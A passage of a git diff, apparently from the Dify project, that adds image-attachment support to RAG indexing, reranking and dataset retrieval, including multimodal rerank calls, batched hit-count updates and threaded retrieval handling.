list[AttachmentDocument] | None = None, + with_keywords: bool = True, + **kwargs, + ): if dataset.indexing_technique == "high_quality": vector = Vector(dataset) for document in documents: @@ -114,6 +130,8 @@ class ParentChildIndexProcessor(BaseIndexProcessor): Document.model_validate(child_document.model_dump()) for child_document in child_documents ] vector.create(formatted_child_documents) + if multimodal_documents and dataset.is_multimodal: + vector.create_multimodal(multimodal_documents) def clean(self, dataset: Dataset, node_ids: list[str] | None, with_keywords: bool = True, **kwargs): # node_ids is segment's node_ids @@ -244,6 +262,24 @@ class ParentChildIndexProcessor(BaseIndexProcessor): } child_documents.append(ChildDocument(page_content=child, metadata=child_metadata)) doc = Document(page_content=parent_child.parent_content, metadata=metadata, children=child_documents) + if parent_child.files and len(parent_child.files) > 0: + attachments = [] + for file in parent_child.files: + file_metadata = { + "doc_id": file.id, + "doc_hash": "", + "document_id": document.id, + "dataset_id": dataset.id, + "doc_type": DocType.IMAGE, + } + file_document = AttachmentDocument(page_content=file.filename or "", metadata=file_metadata) + attachments.append(file_document) + doc.attachments = attachments + else: + account = AccountService.load_user(document.created_by) + if not account: + raise ValueError("Invalid account") + doc.attachments = self._get_content_files(doc, current_user=account) documents.append(doc) if documents: # update document parent mode @@ -267,12 +303,17 @@ class ParentChildIndexProcessor(BaseIndexProcessor): doc_store.add_documents(docs=documents, save_child=True) if dataset.indexing_technique == "high_quality": all_child_documents = [] + all_multimodal_documents = [] for doc in documents: if doc.children: all_child_documents.extend(doc.children) + if doc.attachments: + all_multimodal_documents.extend(doc.attachments) + vector = Vector(dataset) if all_child_documents: - vector = Vector(dataset) vector.create(all_child_documents) + if all_multimodal_documents and dataset.is_multimodal: + vector.create_multimodal(all_multimodal_documents) def format_preview(self, chunks: Any) -> Mapping[str, Any]: parent_childs = ParentChildStructureChunk.model_validate(chunks) @@ -280,7 +321,7 @@ class ParentChildIndexProcessor(BaseIndexProcessor): for parent_child in parent_childs.parent_child_chunks: preview.append({"content": parent_child.parent_content, "child_chunks": parent_child.child_contents}) return { - "chunk_structure": IndexType.PARENT_CHILD_INDEX, + "chunk_structure": IndexStructureType.PARENT_CHILD_INDEX, "parent_mode": parent_childs.parent_mode, "preview": preview, "total_segments": len(parent_childs.parent_child_chunks), diff --git a/api/core/rag/index_processor/processor/qa_index_processor.py b/api/core/rag/index_processor/processor/qa_index_processor.py index 3e3deb0180..1183d5fbd7 100644 --- a/api/core/rag/index_processor/processor/qa_index_processor.py +++ b/api/core/rag/index_processor/processor/qa_index_processor.py @@ -18,12 +18,13 @@ from core.rag.datasource.vdb.vector_factory import Vector from core.rag.docstore.dataset_docstore import DatasetDocumentStore from core.rag.extractor.entity.extract_setting import ExtractSetting from core.rag.extractor.extract_processor import ExtractProcessor -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_base import BaseIndexProcessor -from core.rag.models.document import Document, QAStructureChunk +from core.rag.models.document import AttachmentDocument, Document, QAStructureChunk from core.rag.retrieval.retrieval_methods import RetrievalMethod from core.tools.utils.text_processing_utils import remove_leading_symbols from libs import helper +from models.account import Account from models.dataset import Dataset from models.dataset import Document as DatasetDocument from services.entities.knowledge_entities.knowledge_entities import Rule @@ -41,7 +42,7 @@ class QAIndexProcessor(BaseIndexProcessor): ) return text_docs - def transform(self, documents: list[Document], **kwargs) -> list[Document]: + def transform(self, documents: list[Document], current_user: Account | None = None, **kwargs) -> list[Document]: preview = kwargs.get("preview") process_rule = kwargs.get("process_rule") if not process_rule: @@ -116,7 +117,7 @@ class QAIndexProcessor(BaseIndexProcessor): try: # Skip the first row - df = pd.read_csv(file) + df = pd.read_csv(file) # type: ignore text_docs = [] for _, row in df.iterrows(): data = Document(page_content=row.iloc[0], metadata={"answer": row.iloc[1]}) @@ -128,10 +129,19 @@ class QAIndexProcessor(BaseIndexProcessor): raise ValueError(str(e)) return text_docs - def load(self, dataset: Dataset, documents: list[Document], with_keywords: bool = True, **kwargs): + def load( + self, + dataset: Dataset, + documents: list[Document], + multimodal_documents: list[AttachmentDocument] | None = None, + with_keywords: bool = True, + **kwargs, + ): if dataset.indexing_technique == "high_quality": vector = Vector(dataset) vector.create(documents) + if multimodal_documents and dataset.is_multimodal: + vector.create_multimodal(multimodal_documents) def clean(self, dataset: Dataset, node_ids: list[str] | None, with_keywords: bool = True, **kwargs): vector = Vector(dataset) @@ -197,7 +207,7 @@ class QAIndexProcessor(BaseIndexProcessor): for qa_chunk in qa_chunks.qa_chunks: preview.append({"question": qa_chunk.question, "answer": qa_chunk.answer}) return { - "chunk_structure": IndexType.QA_INDEX, + "chunk_structure": IndexStructureType.QA_INDEX, "qa_preview": preview, "total_segments": len(qa_chunks.qa_chunks), } diff --git a/api/core/rag/models/document.py b/api/core/rag/models/document.py index 4bd7b1d62e..611fad9a18 100644 --- a/api/core/rag/models/document.py +++ b/api/core/rag/models/document.py @@ -4,6 +4,8 @@ from typing import Any from pydantic import BaseModel, Field +from core.file import File + class ChildDocument(BaseModel): """Class for storing a piece of text and associated metadata.""" @@ -15,7 +17,19 @@ class ChildDocument(BaseModel): """Arbitrary metadata about the page content (e.g., source, relationships to other documents, etc.). """ - metadata: dict = Field(default_factory=dict) + metadata: dict[str, Any] = Field(default_factory=dict) + + +class AttachmentDocument(BaseModel): + """Class for storing a piece of text and associated metadata.""" + + page_content: str + + provider: str | None = "dify" + + vector: list[float] | None = None + + metadata: dict[str, Any] = Field(default_factory=dict) class Document(BaseModel): @@ -28,12 +42,31 @@ class Document(BaseModel): """Arbitrary metadata about the page content (e.g., source, relationships to other documents, etc.). """ - metadata: dict = Field(default_factory=dict) + metadata: dict[str, Any] = Field(default_factory=dict) provider: str | None = "dify" children: list[ChildDocument] | None = None + attachments: list[AttachmentDocument] | None = None + + +class GeneralChunk(BaseModel): + """ + General Chunk. + """ + + content: str + files: list[File] | None = None + + +class MultimodalGeneralStructureChunk(BaseModel): + """ + Multimodal General Structure Chunk. + """ + + general_chunks: list[GeneralChunk] + class GeneralStructureChunk(BaseModel): """ @@ -50,6 +83,7 @@ class ParentChildChunk(BaseModel): parent_content: str child_contents: list[str] + files: list[File] | None = None class ParentChildStructureChunk(BaseModel): diff --git a/api/core/rag/rerank/rerank_base.py b/api/core/rag/rerank/rerank_base.py index 3561def008..88acb75133 100644 --- a/api/core/rag/rerank/rerank_base.py +++ b/api/core/rag/rerank/rerank_base.py @@ -1,5 +1,6 @@ from abc import ABC, abstractmethod +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document @@ -12,6 +13,7 @@ class BaseRerankRunner(ABC): score_threshold: float | None = None, top_n: int | None = None, user: str | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, ) -> list[Document]: """ Run rerank model diff --git a/api/core/rag/rerank/rerank_model.py b/api/core/rag/rerank/rerank_model.py index e855b0083f..38309d3d77 100644 --- a/api/core/rag/rerank/rerank_model.py +++ b/api/core/rag/rerank/rerank_model.py @@ -1,6 +1,15 @@ -from core.model_manager import ModelInstance +import base64 + +from core.model_manager import ModelInstance, ModelManager +from core.model_runtime.entities.model_entities import ModelType +from core.model_runtime.entities.rerank_entities import RerankResult +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.rerank.rerank_base import BaseRerankRunner +from extensions.ext_database import db +from extensions.ext_storage import storage +from models.model import UploadFile class RerankModelRunner(BaseRerankRunner): @@ -14,6 +23,7 @@ class RerankModelRunner(BaseRerankRunner): score_threshold: float | None = None, top_n: int | None = None, user: str | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, ) -> list[Document]: """ Run rerank model @@ -24,6 +34,56 @@ class RerankModelRunner(BaseRerankRunner): :param user: unique user id if needed :return: """ + model_manager = ModelManager() + is_support_vision = model_manager.check_model_support_vision( + tenant_id=self.rerank_model_instance.provider_model_bundle.configuration.tenant_id, + provider=self.rerank_model_instance.provider, + model=self.rerank_model_instance.model, + model_type=ModelType.RERANK, + ) + if not is_support_vision: + if query_type == QueryType.TEXT_QUERY: + rerank_result, unique_documents = self.fetch_text_rerank(query, documents, score_threshold, top_n, user) + else: + return documents + else: + rerank_result, unique_documents = self.fetch_multimodal_rerank( + query, documents, score_threshold, top_n, user, query_type + ) + + rerank_documents = [] + for result in rerank_result.docs: + if score_threshold is None or result.score >= score_threshold: + # format document + rerank_document = Document( + page_content=result.text, + metadata=unique_documents[result.index].metadata, + provider=unique_documents[result.index].provider, + ) + if rerank_document.metadata is not None: + rerank_document.metadata["score"] = result.score + rerank_documents.append(rerank_document) + + rerank_documents.sort(key=lambda x: x.metadata.get("score", 0.0), reverse=True) + return rerank_documents[:top_n] if top_n else rerank_documents + + def fetch_text_rerank( + self, + query: str, + documents: list[Document], + score_threshold: float | None = None, + top_n: int | None = None, + user: str | None = None, + ) -> tuple[RerankResult, list[Document]]: + """ + Fetch text rerank + :param query: search query + :param documents: documents for reranking + :param score_threshold: score threshold + :param top_n: top n + :param user: unique user id if needed + :return: + """ docs = [] doc_ids = set() unique_documents = [] @@ -33,33 +93,99 @@ class RerankModelRunner(BaseRerankRunner): and document.metadata is not None and document.metadata["doc_id"] not in doc_ids ): - doc_ids.add(document.metadata["doc_id"]) - docs.append(document.page_content) - unique_documents.append(document) + if not document.metadata.get("doc_type") or document.metadata.get("doc_type") == DocType.TEXT: + doc_ids.add(document.metadata["doc_id"]) + docs.append(document.page_content) + unique_documents.append(document) elif document.provider == "external": if document not in unique_documents: docs.append(document.page_content) unique_documents.append(document) - documents = unique_documents - rerank_result = self.rerank_model_instance.invoke_rerank( query=query, docs=docs, score_threshold=score_threshold, top_n=top_n, user=user ) + return rerank_result, unique_documents - rerank_documents = [] + def fetch_multimodal_rerank( + self, + query: str, + documents: list[Document], + score_threshold: float | None = None, + top_n: int | None = None, + user: str | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, + ) -> tuple[RerankResult, list[Document]]: + """ + Fetch multimodal rerank + :param query: search query + :param documents: documents for reranking + :param score_threshold: score threshold + :param top_n: top n + :param user: unique user id if needed + :param query_type: query type + :return: rerank result + """ + docs = [] + doc_ids = set() + unique_documents = [] + for document in documents: + if ( + document.provider == "dify" + and document.metadata is not None + and document.metadata["doc_id"] not in doc_ids + ): + if document.metadata.get("doc_type") == DocType.IMAGE: + # Query file info within db.session context to ensure thread-safe access + upload_file = ( + db.session.query(UploadFile).where(UploadFile.id == document.metadata["doc_id"]).first() + ) + if upload_file: + blob = storage.load_once(upload_file.key) + document_file_base64 = base64.b64encode(blob).decode() + document_file_dict = { + "content": document_file_base64, + "content_type": document.metadata["doc_type"], + } + docs.append(document_file_dict) + else: + document_text_dict = { + "content": document.page_content, + "content_type": document.metadata.get("doc_type") or DocType.TEXT, + } + docs.append(document_text_dict) + doc_ids.add(document.metadata["doc_id"]) + unique_documents.append(document) + elif document.provider == "external": + if document not in unique_documents: + docs.append( + { + "content": document.page_content, + "content_type": document.metadata.get("doc_type") or DocType.TEXT, + } + ) + unique_documents.append(document) - for result in rerank_result.docs: - if score_threshold is None or result.score >= score_threshold: - # format document - rerank_document = Document( - page_content=result.text, - metadata=documents[result.index].metadata, - provider=documents[result.index].provider, + documents = unique_documents + if query_type == QueryType.TEXT_QUERY: + rerank_result, unique_documents = self.fetch_text_rerank(query, documents, score_threshold, top_n, user) + return rerank_result, unique_documents + elif query_type == QueryType.IMAGE_QUERY: + # Query file info within db.session context to ensure thread-safe access + upload_file = db.session.query(UploadFile).where(UploadFile.id == query).first() + if upload_file: + blob = storage.load_once(upload_file.key) + file_query = base64.b64encode(blob).decode() + file_query_dict = { + "content": file_query, + "content_type": DocType.IMAGE, + } + rerank_result = self.rerank_model_instance.invoke_multimodal_rerank( + query=file_query_dict, docs=docs, score_threshold=score_threshold, top_n=top_n, user=user ) - if rerank_document.metadata is not None: - rerank_document.metadata["score"] = result.score - rerank_documents.append(rerank_document) + return rerank_result, unique_documents + else: + raise ValueError(f"Upload file not found for query: {query}") - rerank_documents.sort(key=lambda x: x.metadata.get("score", 0.0), reverse=True) - return rerank_documents[:top_n] if top_n else rerank_documents + else: + raise ValueError(f"Query type {query_type} is not supported") diff --git a/api/core/rag/rerank/weight_rerank.py b/api/core/rag/rerank/weight_rerank.py index c455db6095..18020608cb 100644 --- a/api/core/rag/rerank/weight_rerank.py +++ b/api/core/rag/rerank/weight_rerank.py @@ -7,6 +7,8 @@ from core.model_manager import ModelManager from core.model_runtime.entities.model_entities import ModelType from core.rag.datasource.keyword.jieba.jieba_keyword_table_handler import JiebaKeywordTableHandler from core.rag.embedding.cached_embedding import CacheEmbedding +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.rerank.entity.weight import VectorSetting, Weights from core.rag.rerank.rerank_base import BaseRerankRunner @@ -24,6 +26,7 @@ class WeightRerankRunner(BaseRerankRunner): score_threshold: float | None = None, top_n: int | None = None, user: str | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, ) -> list[Document]: """ Run rerank model @@ -43,8 +46,10 @@ class WeightRerankRunner(BaseRerankRunner): and document.metadata is not None and document.metadata["doc_id"] not in doc_ids ): - doc_ids.add(document.metadata["doc_id"]) - unique_documents.append(document) + # weight rerank only support text documents + if not document.metadata.get("doc_type") or document.metadata.get("doc_type") == DocType.TEXT: + doc_ids.add(document.metadata["doc_id"]) + unique_documents.append(document) else: if document not in unique_documents: unique_documents.append(document) diff --git a/api/core/rag/retrieval/dataset_retrieval.py b/api/core/rag/retrieval/dataset_retrieval.py index 3db67efb0e..635eab73f0 100644 --- a/api/core/rag/retrieval/dataset_retrieval.py +++ b/api/core/rag/retrieval/dataset_retrieval.py @@ -8,6 +8,7 @@ from typing import Any, Union, cast from flask import Flask, current_app from sqlalchemy import and_, or_, select +from sqlalchemy.orm import Session from core.app.app_config.entities import ( DatasetEntity, @@ -19,6 +20,7 @@ from core.app.entities.app_invoke_entities import InvokeFrom, ModelConfigWithCre from core.callback_handler.index_tool_callback_handler import DatasetIndexToolCallbackHandler from core.entities.agent_entities import PlanningStrategy from core.entities.model_entities import ModelStatus +from core.file import File, FileTransferMethod, FileType from core.memory.token_buffer_memory import TokenBufferMemory from core.model_manager import ModelInstance, ModelManager from core.model_runtime.entities.llm_entities import LLMResult, LLMUsage @@ -37,7 +39,9 @@ from core.rag.datasource.retrieval_service import RetrievalService from core.rag.entities.citation_metadata import RetrievalSourceMetadata from core.rag.entities.context_entities import DocumentContext from core.rag.entities.metadata_entities import Condition, MetadataCondition -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType, IndexTechniqueType +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.rerank.rerank_type import RerankMode from core.rag.retrieval.retrieval_methods import RetrievalMethod @@ -52,10 +56,12 @@ from core.rag.retrieval.template_prompts import ( METADATA_FILTER_USER_PROMPT_2, METADATA_FILTER_USER_PROMPT_3, ) +from core.tools.signature import sign_upload_file from core.tools.utils.dataset_retriever.dataset_retriever_base_tool import DatasetRetrieverBaseTool from extensions.ext_database import db from libs.json_in_md_parser import parse_and_check_json_markdown -from models.dataset import ChildChunk, Dataset, DatasetMetadata, DatasetQuery, DocumentSegment +from models import UploadFile +from models.dataset import ChildChunk, Dataset, DatasetMetadata, DatasetQuery, DocumentSegment, SegmentAttachmentBinding from models.dataset import Document as DatasetDocument from services.external_knowledge_service import ExternalDatasetService @@ -99,7 +105,8 @@ class DatasetRetrieval: message_id: str, memory: TokenBufferMemory | None = None, inputs: Mapping[str, Any] | None = None, - ) -> str | None: + vision_enabled: bool = False, + ) -> tuple[str | None, list[File] | None]: """ Retrieve dataset. :param app_id: app_id @@ -118,7 +125,7 @@ class DatasetRetrieval: """ dataset_ids = config.dataset_ids if len(dataset_ids) == 0: - return None + return None, [] retrieve_config = config.retrieve_config # check model is support tool calling @@ -136,7 +143,7 @@ class DatasetRetrieval: ) if not model_schema: - return None + return None, [] planning_strategy = PlanningStrategy.REACT_ROUTER features = model_schema.features @@ -182,8 +189,8 @@ class DatasetRetrieval: tenant_id, user_id, user_from, - available_datasets, query, + available_datasets, model_instance, model_config, planning_strategy, @@ -213,6 +220,7 @@ class DatasetRetrieval: dify_documents = [item for item in all_documents if item.provider == "dify"] external_documents = [item for item in all_documents if item.provider == "external"] document_context_list: list[DocumentContext] = [] + context_files: list[File] = [] retrieval_resource_list: list[RetrievalSourceMetadata] = [] # deal with external documents for item in external_documents: @@ -248,6 +256,31 @@ class DatasetRetrieval: score=record.score, ) ) + if vision_enabled: + attachments_with_bindings = db.session.execute( + select(SegmentAttachmentBinding, UploadFile) + .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id) + .where( + SegmentAttachmentBinding.segment_id == segment.id, + ) + ).all() + if attachments_with_bindings: + for _, upload_file in attachments_with_bindings: + attachment_info = File( + id=upload_file.id, + filename=upload_file.name, + extension="." + upload_file.extension, + mime_type=upload_file.mime_type, + tenant_id=segment.tenant_id, + type=FileType.IMAGE, + transfer_method=FileTransferMethod.LOCAL_FILE, + remote_url=upload_file.source_url, + related_id=upload_file.id, + size=upload_file.size, + storage_key=upload_file.key, + url=sign_upload_file(upload_file.id, upload_file.extension), + ) + context_files.append(attachment_info) if show_retrieve_source: for record in records: segment = record.segment @@ -288,8 +321,10 @@ class DatasetRetrieval: hit_callback.return_retriever_resource_info(retrieval_resource_list) if document_context_list: document_context_list = sorted(document_context_list, key=lambda x: x.score or 0.0, reverse=True) - return str("\n".join([document_context.content for document_context in document_context_list])) - return "" + return str( + "\n".join([document_context.content for document_context in document_context_list]) + ), context_files + return "", context_files def single_retrieve( self, @@ -297,8 +332,8 @@ class DatasetRetrieval: tenant_id: str, user_id: str, user_from: str, - available_datasets: list, query: str, + available_datasets: list, model_instance: ModelInstance, model_config: ModelConfigWithCredentialsEntity, planning_strategy: PlanningStrategy, @@ -336,7 +371,7 @@ class DatasetRetrieval: dataset_id, router_usage = function_call_router.invoke(query, tools, model_config, model_instance) self._record_usage(router_usage) - + timer = None if dataset_id: # get retrieval model config dataset_stmt = select(Dataset).where(Dataset.id == dataset_id) @@ -406,10 +441,19 @@ class DatasetRetrieval: weights=retrieval_model_config.get("weights", None), document_ids_filter=document_ids_filter, ) - self._on_query(query, [dataset_id], app_id, user_from, user_id) + self._on_query(query, None, [dataset_id], app_id, user_from, user_id) if results: - self._on_retrieval_end(results, message_id, timer) + thread = threading.Thread( + target=self._on_retrieval_end, + kwargs={ + "flask_app": current_app._get_current_object(), # type: ignore + "documents": results, + "message_id": message_id, + "timer": timer, + }, + ) + thread.start() return results return [] @@ -421,7 +465,7 @@ class DatasetRetrieval: user_id: str, user_from: str, available_datasets: list, - query: str, + query: str | None, top_k: int, score_threshold: float, reranking_mode: str, @@ -431,10 +475,11 @@ class DatasetRetrieval: message_id: str | None = None, metadata_filter_document_ids: dict[str, list[str]] | None = None, metadata_condition: MetadataCondition | None = None, + attachment_ids: list[str] | None = None, ): if not available_datasets: return [] - threads = [] + all_threads = [] all_documents: list[Document] = [] dataset_ids = [dataset.id for dataset in available_datasets] index_type_check = all( @@ -467,102 +512,187 @@ class DatasetRetrieval: 0 ].embedding_model_provider weights["vector_setting"]["embedding_model_name"] = available_datasets[0].embedding_model - - for dataset in available_datasets: - index_type = dataset.indexing_technique - document_ids_filter = None - if dataset.provider != "external": - if metadata_condition and not metadata_filter_document_ids: - continue - if metadata_filter_document_ids: - document_ids = metadata_filter_document_ids.get(dataset.id, []) - if document_ids: - document_ids_filter = document_ids - else: - continue - retrieval_thread = threading.Thread( - target=self._retriever, - kwargs={ - "flask_app": current_app._get_current_object(), # type: ignore - "dataset_id": dataset.id, - "query": query, - "top_k": top_k, - "all_documents": all_documents, - "document_ids_filter": document_ids_filter, - "metadata_condition": metadata_condition, - }, - ) - threads.append(retrieval_thread) - retrieval_thread.start() - for thread in threads: - thread.join() - with measure_time() as timer: - if reranking_enable: - # do rerank for searched documents - data_post_processor = DataPostProcessor(tenant_id, reranking_mode, reranking_model, weights, False) - - all_documents = data_post_processor.invoke( - query=query, documents=all_documents, score_threshold=score_threshold, top_n=top_k + if query: + query_thread = threading.Thread( + target=self._multiple_retrieve_thread, + kwargs={ + "flask_app": current_app._get_current_object(), # type: ignore + "available_datasets": available_datasets, + "metadata_condition": metadata_condition, + "metadata_filter_document_ids": metadata_filter_document_ids, + "all_documents": all_documents, + "tenant_id": tenant_id, + "reranking_enable": reranking_enable, + "reranking_mode": reranking_mode, + "reranking_model": reranking_model, + "weights": weights, + "top_k": top_k, + "score_threshold": score_threshold, + "query": query, + "attachment_id": None, + }, ) - else: - if index_type == "economy": - all_documents = self.calculate_keyword_score(query, all_documents, top_k) - elif index_type == "high_quality": - all_documents = self.calculate_vector_score(all_documents, top_k, score_threshold) - else: - all_documents = all_documents[:top_k] if top_k else all_documents - - self._on_query(query, dataset_ids, app_id, user_from, user_id) + all_threads.append(query_thread) + query_thread.start() + if attachment_ids: + for attachment_id in attachment_ids: + attachment_thread = threading.Thread( + target=self._multiple_retrieve_thread, + kwargs={ + "flask_app": current_app._get_current_object(), # type: ignore + "available_datasets": available_datasets, + "metadata_condition": metadata_condition, + "metadata_filter_document_ids": metadata_filter_document_ids, + "all_documents": all_documents, + "tenant_id": tenant_id, + "reranking_enable": reranking_enable, + "reranking_mode": reranking_mode, + "reranking_model": reranking_model, + "weights": weights, + "top_k": top_k, + "score_threshold": score_threshold, + "query": None, + "attachment_id": attachment_id, + }, + ) + all_threads.append(attachment_thread) + attachment_thread.start() + for thread in all_threads: + thread.join() + self._on_query(query, attachment_ids, dataset_ids, app_id, user_from, user_id) if all_documents: - self._on_retrieval_end(all_documents, message_id, timer) + # add thread to call _on_retrieval_end + retrieval_end_thread = threading.Thread( + target=self._on_retrieval_end, + kwargs={ + "flask_app": current_app._get_current_object(), # type: ignore + "documents": all_documents, + "message_id": message_id, + "timer": timer, + }, + ) + retrieval_end_thread.start() + retrieval_resource_list = [] + doc_ids_filter = [] + for document in all_documents: + if document.provider == "dify": + doc_id = document.metadata.get("doc_id") + if doc_id and doc_id not in doc_ids_filter: + doc_ids_filter.append(doc_id) + retrieval_resource_list.append(document) + elif document.provider == "external": + retrieval_resource_list.append(document) + return retrieval_resource_list - return all_documents - - def _on_retrieval_end(self, documents: list[Document], message_id: str | None = None, timer: dict | None = None): + def _on_retrieval_end( + self, flask_app: Flask, documents: list[Document], message_id: str | None = None, timer: dict | None = None + ): """Handle retrieval end.""" - dify_documents = [document for document in documents if document.provider == "dify"] - for document in dify_documents: - if document.metadata is not None: - dataset_document_stmt = select(DatasetDocument).where( - DatasetDocument.id == document.metadata["document_id"] - ) - dataset_document = db.session.scalar(dataset_document_stmt) - if dataset_document: - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: - child_chunk_stmt = select(ChildChunk).where( - ChildChunk.index_node_id == document.metadata["doc_id"], - ChildChunk.dataset_id == dataset_document.dataset_id, - ChildChunk.document_id == dataset_document.id, - ) - child_chunk = db.session.scalar(child_chunk_stmt) - if child_chunk: - _ = ( - db.session.query(DocumentSegment) - .where(DocumentSegment.id == child_chunk.segment_id) - .update( - {DocumentSegment.hit_count: DocumentSegment.hit_count + 1}, - synchronize_session=False, - ) - ) + with flask_app.app_context(): + dify_documents = [document for document in documents if document.provider == "dify"] + if not dify_documents: + self._send_trace_task(message_id, documents, timer) + return + + with Session(db.engine) as session: + # Collect all document_ids and batch fetch DatasetDocuments + document_ids = { + doc.metadata["document_id"] + for doc in dify_documents + if doc.metadata and "document_id" in doc.metadata + } + if not document_ids: + self._send_trace_task(message_id, documents, timer) + return + + dataset_docs_stmt = select(DatasetDocument).where(DatasetDocument.id.in_(document_ids)) + dataset_docs = session.scalars(dataset_docs_stmt).all() + dataset_doc_map = {str(doc.id): doc for doc in dataset_docs} + + # Categorize documents by type and collect necessary IDs + parent_child_text_docs: list[tuple[Document, DatasetDocument]] = [] + parent_child_image_docs: list[tuple[Document, DatasetDocument]] = [] + normal_text_docs: list[tuple[Document, DatasetDocument]] = [] + normal_image_docs: list[tuple[Document, DatasetDocument]] = [] + + for doc in dify_documents: + if not doc.metadata or "document_id" not in doc.metadata: + continue + dataset_doc = dataset_doc_map.get(doc.metadata["document_id"]) + if not dataset_doc: + continue + + is_image = doc.metadata.get("doc_type") == DocType.IMAGE + is_parent_child = dataset_doc.doc_form == IndexStructureType.PARENT_CHILD_INDEX + + if is_parent_child: + if is_image: + parent_child_image_docs.append((doc, dataset_doc)) + else: + parent_child_text_docs.append((doc, dataset_doc)) else: - query = db.session.query(DocumentSegment).where( - DocumentSegment.index_node_id == document.metadata["doc_id"] + if is_image: + normal_image_docs.append((doc, dataset_doc)) + else: + normal_text_docs.append((doc, dataset_doc)) + + segment_ids_to_update: set[str] = set() + + # Process PARENT_CHILD_INDEX text documents - batch fetch ChildChunks + if parent_child_text_docs: + index_node_ids = [doc.metadata["doc_id"] for doc, _ in parent_child_text_docs if doc.metadata] + if index_node_ids: + child_chunks_stmt = select(ChildChunk).where(ChildChunk.index_node_id.in_(index_node_ids)) + child_chunks = session.scalars(child_chunks_stmt).all() + child_chunk_map = {chunk.index_node_id: chunk.segment_id for chunk in child_chunks} + for doc, _ in parent_child_text_docs: + if doc.metadata: + segment_id = child_chunk_map.get(doc.metadata["doc_id"]) + if segment_id: + segment_ids_to_update.add(str(segment_id)) + + # Process non-PARENT_CHILD_INDEX text documents - batch fetch DocumentSegments + if normal_text_docs: + index_node_ids = [doc.metadata["doc_id"] for doc, _ in normal_text_docs if doc.metadata] + if index_node_ids: + segments_stmt = select(DocumentSegment).where(DocumentSegment.index_node_id.in_(index_node_ids)) + segments = session.scalars(segments_stmt).all() + segment_map = {seg.index_node_id: seg.id for seg in segments} + for doc, _ in normal_text_docs: + if doc.metadata: + segment_id = segment_map.get(doc.metadata["doc_id"]) + if segment_id: + segment_ids_to_update.add(str(segment_id)) + + # Process IMAGE documents - batch fetch SegmentAttachmentBindings + all_image_docs = parent_child_image_docs + normal_image_docs + if all_image_docs: + attachment_ids = [ + doc.metadata["doc_id"] + for doc, _ in all_image_docs + if doc.metadata and doc.metadata.get("doc_id") + ] + if attachment_ids: + bindings_stmt = select(SegmentAttachmentBinding).where( + SegmentAttachmentBinding.attachment_id.in_(attachment_ids) ) + bindings = session.scalars(bindings_stmt).all() + segment_ids_to_update.update(str(binding.segment_id) for binding in bindings) - # if 'dataset_id' in document.metadata: - if "dataset_id" in document.metadata: - query = query.where(DocumentSegment.dataset_id == document.metadata["dataset_id"]) + # Batch update hit_count for all segments + if segment_ids_to_update: + session.query(DocumentSegment).where(DocumentSegment.id.in_(segment_ids_to_update)).update( + {DocumentSegment.hit_count: DocumentSegment.hit_count + 1}, + synchronize_session=False, + ) + session.commit() - # add hit count to document segment - query.update( - {DocumentSegment.hit_count: DocumentSegment.hit_count + 1}, synchronize_session=False - ) + self._send_trace_task(message_id, documents, timer) - db.session.commit() - - # get tracing instance + def _send_trace_task(self, message_id: str | None, documents: list[Document], timer: dict | None): + """Send trace task if trace manager is available.""" trace_manager: TraceQueueManager | None = ( self.application_generate_entity.trace_manager if self.application_generate_entity else None ) @@ -573,25 +703,40 @@ class DatasetRetrieval: ) ) - def _on_query(self, query: str, dataset_ids: list[str], app_id: str, user_from: str, user_id: str): + def _on_query( + self, + query: str | None, + attachment_ids: list[str] | None, + dataset_ids: list[str], + app_id: str, + user_from: str, + user_id: str, + ): """ Handle query. """ - if not query: + if not query and not attachment_ids: return dataset_queries = [] for dataset_id in dataset_ids: - dataset_query = DatasetQuery( - dataset_id=dataset_id, - content=query, - source="app", - source_app_id=app_id, - created_by_role=user_from, - created_by=user_id, - ) - dataset_queries.append(dataset_query) - if dataset_queries: - db.session.add_all(dataset_queries) + contents = [] + if query: + contents.append({"content_type": QueryType.TEXT_QUERY, "content": query}) + if attachment_ids: + for attachment_id in attachment_ids: + contents.append({"content_type": QueryType.IMAGE_QUERY, "content": attachment_id}) + if contents: + dataset_query = DatasetQuery( + dataset_id=dataset_id, + content=json.dumps(contents), + source="app", + source_app_id=app_id, + created_by_role=user_from, + created_by=user_id, + ) + dataset_queries.append(dataset_query) + if dataset_queries: + db.session.add_all(dataset_queries) db.session.commit() def _retriever( @@ -603,6 +748,7 @@ class DatasetRetrieval: all_documents: list, document_ids_filter: list[str] | None = None, metadata_condition: MetadataCondition | None = None, + attachment_ids: list[str] | None = None, ): with flask_app.app_context(): dataset_stmt = select(Dataset).where(Dataset.id == dataset_id) @@ -611,7 +757,7 @@ class DatasetRetrieval: if not dataset: return [] - if dataset.provider == "external": + if dataset.provider == "external" and query: external_documents = ExternalDatasetService.fetch_external_knowledge_retrieval( tenant_id=dataset.tenant_id, dataset_id=dataset_id, @@ -663,6 +809,7 @@ class DatasetRetrieval: reranking_mode=retrieval_model.get("reranking_mode") or "reranking_model", weights=retrieval_model.get("weights", None), document_ids_filter=document_ids_filter, + attachment_ids=attachment_ids, ) all_documents.extend(documents) @@ -1222,3 +1369,86 @@ class DatasetRetrieval: usage = LLMUsage.empty_usage() return full_text, usage + + def _multiple_retrieve_thread( + self, + flask_app: Flask, + available_datasets: list, + metadata_condition: MetadataCondition | None, + metadata_filter_document_ids: dict[str, list[str]] | None, + all_documents: list[Document], + tenant_id: str, + reranking_enable: bool, + reranking_mode: str, + reranking_model: dict | None, + weights: dict[str, Any] | None, + top_k: int, + score_threshold: float, + query: str | None, + attachment_id: str | None, + ): + with flask_app.app_context(): + threads = [] + all_documents_item: list[Document] = [] + index_type = None + for dataset in available_datasets: + index_type = dataset.indexing_technique + document_ids_filter 